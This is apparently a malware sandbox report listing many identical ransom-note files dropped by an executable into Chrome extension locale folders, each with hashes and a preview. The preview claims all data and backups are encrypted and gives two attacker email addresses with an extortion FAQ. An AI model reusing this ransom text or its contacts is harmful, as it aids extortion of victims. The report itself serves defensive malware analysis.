                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\is\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\iw\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ka\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\km\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kn\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lo\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ml\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
